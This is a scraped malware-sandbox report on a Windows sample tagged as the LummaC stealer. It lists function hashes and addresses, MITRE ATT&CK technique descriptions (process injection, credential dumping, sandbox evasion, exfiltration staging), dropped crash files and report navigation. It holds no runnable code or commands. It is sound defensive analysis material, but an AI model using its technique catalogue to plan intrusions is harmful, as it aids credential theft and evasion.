Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29e30762cd198d07baf172038ea6e678641816a83bca1c3dbf879ffd016bfde3
Instruction ID: 371553e45ab929fe83f0a13bf06f5ff7ad051914c92a5721319aaed671c6cf58
Opcode Fuzzy Hash: 29e30762cd198d07baf172038ea6e678641816a83bca1c3dbf879ffd016bfde3
Instruction Fuzzy Hash: ADF1BD756087418FC724CF29C88066BFBE6EFD9300F08882DE5D597391E639E944CB9A

Function 0040B21B Relevance: .4, Instructions: 425COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a7f153410e4251e82ecbdb7d1c57cec0623d54066d7bf3bae5e76a8247bb8de
Instruction ID: 3f95f24010408f1a771159b3471afe1a5f588a49a5aab4d79e7bac2269008839
Opcode Fuzzy Hash: 8a7f153410e4251e82ecbdb7d1c57cec0623d54066d7bf3bae5e76a8247bb8de
Instruction Fuzzy Hash: 83D1BE76600B01CFD7288F29DC91717B7F1FB89315B09893DE5AAC7AA1DB38E8158B44

Function 00440AF0 Relevance: .4, Instructions: 422COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e00aa3d56d1f70f1eea41a374cc1fe7af645c7f224f3d5ef916b0c29e431497
Instruction ID: 42074247ddd2d8de66e6b4c4d9fdd3bdba566344273193ce307edd071099422d
Opcode Fuzzy Hash: 1e00aa3d56d1f70f1eea41a374cc1fe7af645c7f224f3d5ef916b0c29e431497
Instruction Fuzzy Hash: D1D10236658350CFD308CF28D89062AB7E1FBCA314F19897DD98587351E639E961CB46

Function 00440BA0 Relevance: .4, Instructions: 421COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31fc4e36fc577c9cc0898de4e73c53116aacb9ce8448d8a56ac4893c3bcd8172
Instruction ID: ae1164e242d8c002ce3d3183e52b70cd05e6e4c76fcda1d0921cff4127bb2f27
Opcode Fuzzy Hash: 31fc4e36fc577c9cc0898de4e73c53116aacb9ce8448d8a56ac4893c3bcd8172
Instruction Fuzzy Hash: A4D1F136A183508FD308CF38D89062BB7E2FBCA314F19893DE98987351E635D915CB86

Function 0042D5AC Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7418cc8208a5f9779f222691faa292d9316b70fec98389ccbe16fe331680ed22
Instruction ID: 764e8545682cec428565d8d7a19c647d6b7152fef662b0ce68b048586b7d50b0
Opcode Fuzzy Hash: 7418cc8208a5f9779f222691faa292d9316b70fec98389ccbe16fe331680ed22
Instruction Fuzzy Hash: 9D411860E083E04BE3368B29A8607B3BFD1AFE7705F68489DE4DA5B382D5384406C756

Function 0044046D Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac3b3acb6f9eec2961e42715a88ed37f6bd16a6697aadc50af766eab071849f7
Instruction ID: 751bd30a265410283deb45ea2271280ae272e494cdac8a05bee2336c012dc1ec
Opcode Fuzzy Hash: ac3b3acb6f9eec2961e42715a88ed37f6bd16a6697aadc50af766eab071849f7
Instruction Fuzzy Hash: 4751BD3A90C6E14BE735CB3DC4D046D7FA1AE96214B5942AEC8E00F3C3C1BAD945DBA5

Function 00440ED0 Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19eb808df92c0b26cef8703c3ffde7bd97307831a7cfc05321fd101c1d79f085
Instruction ID: a63337eaa4933f28d9d3cd1b9eed100eb88bbd7380655088c286442e7e2adf5d
Opcode Fuzzy Hash: 19eb808df92c0b26cef8703c3ffde7bd97307831a7cfc05321fd101c1d79f085
Instruction Fuzzy Hash: 0F512536A18250CFD304CF38D88026AB7E2FB8A315F198D7DD889C7251E73AD956CB46

Function 0042EF3F Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bcba2b6916a69f736edd97be17fe1c6803ed1f808eba87428d15b8c0623ecb1
Instruction ID: 770b3c2a1171b53a1e95ad9f4b277d85647a37a8480f1c621dc665ed749926a5
Opcode Fuzzy Hash: 5bcba2b6916a69f736edd97be17fe1c6803ed1f808eba87428d15b8c0623ecb1
Instruction Fuzzy Hash: 4B51C1716083919BC729CF28D5617EBFBE1AFD6304F18896DD0C987342D7788905CB9A

Function 0043B300 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 493c1171587784aab1950dc7a786e9e471f4be60286c380f6ab701eba1ee81d8
Instruction ID: 26a041c5e2359bd87aed152d35076de60e9c8f76ecf55b57d9db7f0dfeac47fe
Opcode Fuzzy Hash: 493c1171587784aab1950dc7a786e9e471f4be60286c380f6ab701eba1ee81d8
Instruction Fuzzy Hash: 98416772A083245BEB10AA15EC4172FB7A9EF95718F10542EFE84A7352D334DC048BEB

Function 004330F0 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2925b3ff330583e597499ba1a4591a763adad796370e63afcebefc1de81bf6fe
Instruction ID: 2dcf4af7993bda6ce9f107f5dc99bfe24a3ca610639a32364b69784d18d1cf74
Opcode Fuzzy Hash: 2925b3ff330583e597499ba1a4591a763adad796370e63afcebefc1de81bf6fe
Instruction Fuzzy Hash: E1419D1BA08AB046C324897D4841237FAD19FD9729F1A57EBECD45B3D1D12C8D0583D9

Function 0040CAB2 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dda62e891e7ee33c7f6ae218ce2900f44faea19aed841d2bc7863eff8cc5fb0
Instruction ID: 65f135b4b7740eafa1228b2c86321306a7245ca77e162839a5f402bf9c4f870d
Opcode Fuzzy Hash: 0dda62e891e7ee33c7f6ae218ce2900f44faea19aed841d2bc7863eff8cc5fb0
Instruction Fuzzy Hash: CB319375640001DBD728DB18FCD2A32B3B3FB8A358B645336D115A32E1D734FC268A59

Function 0042EC6B Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01c3ddd03c786211fe1bfc96dc94a8d57f7ee3977e859dc26b890c60a9ed4b5e
Instruction ID: 76765fb7a9008b976e8578b923dda3f926c9dea9cae1d721c3bc7b7eaaecc1ae
Opcode Fuzzy Hash: 01c3ddd03c786211fe1bfc96dc94a8d57f7ee3977e859dc26b890c60a9ed4b5e
Instruction Fuzzy Hash: 5D41D5356183E08AE735CF25D8217EBBBE1ABD7304F58986DC5C897382CB3945068B97

Function 0041A28A Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f76be10a378803b2f440d560f957399ed65297039dfb7de60a9548dd77461a2b
Instruction ID: 15a922d31bf5397e57c57d2eb4afa6a78dba1d4a5b4fe5151ae25c7009868574
Opcode Fuzzy Hash: f76be10a378803b2f440d560f957399ed65297039dfb7de60a9548dd77461a2b
Instruction Fuzzy Hash: 0A1102704093918FDB228F3994607B2FFE0EF17310F2805CAD4E64B792C2299496DB9B

Function 0042B240 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 067dd3f0a356ba77dbe2ef4fdf49273fe2fa1f65738edfc06acb4d27a21e6113
Instruction ID: f95ccd5c1e07fdba5a6b1ce965763e3e344b5dd236464c9b7168bce5447a1aa5
Opcode Fuzzy Hash: 067dd3f0a356ba77dbe2ef4fdf49273fe2fa1f65738edfc06acb4d27a21e6113
Instruction Fuzzy Hash: 8601B1F170072197DB209E52A5C872FB3A9AF80708F09407EE85857342DB79EC0883F9

Function 0041A7F6 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e84e020e0a634013b8d590e9ec40e41bf577afccfe6903ce9e4ae7839292a078
Instruction ID: c1e1313793d015acb42bf2898a4337a55ff5120e3969cd7936ff0a8dbd393111
Opcode Fuzzy Hash: e84e020e0a634013b8d590e9ec40e41bf577afccfe6903ce9e4ae7839292a078
Instruction Fuzzy Hash: AE0186305082D18FDB228F2994506B7BFE0DF5B310F0855D6D4D59F2C3C2298985C7A5

Function 0041A60C Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1419fa78d6a1039748fef708a65309ac318c5c708fbaa929b64f3090d2871bb4
Instruction ID: 83857050257fa79712498fa501624980af833af2fdaf7539a5b7ba836c1c0a1a
Opcode Fuzzy Hash: 1419fa78d6a1039748fef708a65309ac318c5c708fbaa929b64f3090d2871bb4
Instruction Fuzzy Hash: 29F0A4205082D18FDB238F2998602B7BFA0DF57310F0855D6D0E19F2C3C22A4985C7A5

Function 004180AC Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b932f69be8761acc6f0aa65eb53a2ca056a1cc266c137de5ad9e8b6a91f1ef8
Instruction ID: e2f8cf1c48d2213eb4d1dc5e0381a0ce5016700f3c7598892a362b01e8a2dc08
Opcode Fuzzy Hash: 9b932f69be8761acc6f0aa65eb53a2ca056a1cc266c137de5ad9e8b6a91f1ef8
Instruction Fuzzy Hash: 00F0A435A44304EBD6348B18D8417B7B3B2F7CB310F21972EE598532A4DB34AC528A5E

Function 00402B70 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95fbf216a3c874508104a76c0cabc353cd83aac7d25e52a6b1a90389e7c88156
Instruction ID: a598e38f4c58885c8d2f4209a48d3d433457380b3f8601a763830e9056b5a994
Opcode Fuzzy Hash: 95fbf216a3c874508104a76c0cabc353cd83aac7d25e52a6b1a90389e7c88156
Instruction Fuzzy Hash: E6F0247B7246160FE310DDBADC8457BB3A6D7C5214F29403AE490E3741E8B9E80192A8

Function 0043EA02 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8a4e1023fcf9285f642157c2fc2208c4d3705142b58bc73f6611dc839cdeacd
Instruction ID: 7145e085874b5d9d02a41695de230916bbf818278a9c2398993db132710a5c9e
Opcode Fuzzy Hash: b8a4e1023fcf9285f642157c2fc2208c4d3705142b58bc73f6611dc839cdeacd
Instruction Fuzzy Hash: C8F0F635E500018BD714DF38DC615BB77E2EB4A210F0D5579C512D7392EA24EC908788

Function 0041E790 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction ID: fbdf1c2c447d2bdf2fdf32038ffa8c2cf21e3f4cd619e72442ec6ce1d81cc30a
Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction Fuzzy Hash: D7D097345083A00EA7088D3800A04B7FBE8E983212B18188FE8E1E3289C224DC01429C

Function 0040B6E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00408900), ref: 0040B6E6
FreeLibrary.KERNEL32 ref: 0040B707

Strings

ou, xrefs: 0040B6E6, 0040B707

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID: FreeLibrary
String ID: ou
API String ID: 3664257935-3837949563
Opcode ID: a485c630acd3f85f5e4c6cfda9c49240b56fe8590d8370fafad6b6e1bb297bec
Instruction ID: 63f9b6ca4f083220e6d80fcdc0bbedb1e71f47889e472d57d7d51e72ea7c1998
Opcode Fuzzy Hash: a485c630acd3f85f5e4c6cfda9c49240b56fe8590d8370fafad6b6e1bb297bec
Instruction Fuzzy Hash: AAC0023D8D5401EBEF016FA0FE0D8183B75FB437067108034B90140136EA360970AE1F

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to low risk score due to lack of evidence" ] }
Date: unknown

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report EZsrFTi.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_EZsrFTi.exe_8bde2ce7b05c3e4d9823037f951ae1af74e29a_082384c3_4539f800-7d38-42ed-b13d-55fd9ae4ddfd\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFB06.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFC4F.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFC6F.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Windows Analysis Report
EZsrFTi.exe

Function 029E8125 Relevance: 42.3, APIs: 11, Strings: 13, Instructions: 294
threadinjectionmemoryCOMMON

Function 029E82A2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82
threadinjectionmemoryCOMMON

Function 00CA7138 Relevance: 1.7, APIs: 1, Instructions: 244
COMMON

Function 0043A2B0 Relevance: 27.0, APIs: 11, Strings: 4, Instructions: 785
memorycomCOMMON

